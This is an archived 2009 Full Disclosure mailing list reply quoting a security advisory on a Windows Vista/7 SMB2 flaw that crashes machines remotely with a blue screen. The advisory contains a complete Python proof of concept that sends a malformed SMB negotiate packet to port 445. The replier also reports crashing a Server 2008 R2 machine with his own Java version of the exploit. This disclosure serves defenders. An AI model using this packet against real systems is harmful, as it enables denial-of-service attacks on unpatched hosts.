Full Disclosure mailing list archives
Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
From: "Randal T. Rioux" <randy () procyonlabs com>
Date: Mon, 14 Sep 2009 15:13:58 -0400
Scratch that - the version of 2008 I had wasn't an official R2 release. So original reports still hold. It didn't crash my R2 build 7600. Laurent, et al, has this been tried against an Itanium machine? Just curious. Nobody at work will let me test the exploit against their Itanium servers. Randy On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote:Advisory updated : ============================================= - Release date: September 7th, 2009 - Discovered by: Laurent GaffiƩ - Severity: High ============================================= I. VULNERABILITY ------------------------- Windows Vista, Server 2008 < R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND ------------------------- Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION ------------------------- [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT ------------------------- Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT ------------------------- An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED ------------------------- [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC. VII. SOLUTION ------------------------- No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES ------------------------- http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent GaffiƩ Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com> X. REVISION HISTORY ------------------------- September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes ------------------------- Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. laurent gaffie (Sep 07)
- <Possible follow-ups>
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. randomguy (Sep 09)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. James Matthews (Sep 09)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. D-vice (Sep 10)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Mitch Oliver (Sep 10)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. laurent gaffie (Sep 11)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 13)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. D-vice (Sep 14)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 14)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 14)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. James Matthews (Sep 09)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOLREQUEST Remote B.S.O.D. mutiny (Sep 10)